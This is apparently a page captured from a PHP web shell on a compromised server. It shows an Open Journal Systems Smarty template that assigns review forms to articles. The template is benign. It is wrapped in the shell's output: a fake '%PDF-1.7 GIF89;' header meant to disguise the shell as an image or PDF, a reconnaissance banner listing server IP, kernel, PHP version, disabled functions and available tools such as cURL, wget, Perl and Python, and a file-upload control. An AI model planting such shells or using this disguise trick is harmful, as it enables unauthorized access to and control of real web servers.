%PDF-1.7 GIF89;
| Server IP : 172.66.157.178 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/templates/sectionEditor/ |
Upload File : |
{**
* templates/sectionEditor/selectReviewForm.tpl
*
* Copyright (c) 2013-2019 Simon Fraser University
* Copyright (c) 2003-2019 John Willinsky
* Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
*
* Assign a review form to a review.
*
*}
{strip}
{assign var="pageTitle" value="editor.article.reviewForms"}
{include file="common/header.tpl"}
{/strip}
<h3>{translate key="editor.article.selectReviewForm"}</h3>
<div id="assignReviewForm">
<table width="100%" class="listing">
<tr>
<td class="headseparator" colspan="2"> </td>
</tr>
<tr class="heading" valign="bottom">
<td width="85%">{translate key="manager.reviewForms.title"}</td>
<td width="15%" align="right">{translate key="common.action"}</td>
</tr>
<tr>
<td class="headseparator" colspan="2"> </td>
</tr>
{iterate from=reviewForms item=reviewForm name=reviewForms}
<tr valign="top">
<td>{$reviewForm->getLocalizedTitle()|escape}</td>
<td class="nowrap">
{if $assignedReviewFormId == $reviewForm->getId()}{translate key="common.alreadyAssigned"}{else}<a href="{url op="selectReviewForm" path=$articleId|to_array:$reviewId:$reviewForm->getId()}" class="action">{translate key="common.assign"}</a>{/if} | <a href="{url op="previewReviewForm" path=$reviewId|to_array:$reviewForm->getId()}" class="action">{translate key="common.preview"}</a>
</tr>
<tr>
<td colspan="2" class="{if $reviewForms->eof()}end{/if}separator"> </td>
</tr>
{/iterate}
{if $reviewForms->wasEmpty()}
<tr>
<td colspan="2" class="nodata">{translate key="manager.reviewForms.noneCreated"}</td>
</tr>
<tr>
<td colspan="2" class="endseparator"> </td>
</tr>
{else}
<tr>
<td align="left">{page_info iterator=$reviewForms}</td>
<td align="right">{page_links anchor="reviewForms" name="reviewForms" iterator=$reviewForms}</td>
</tr>
{/if}
</table>
</div>
{include file="common/footer.tpl"}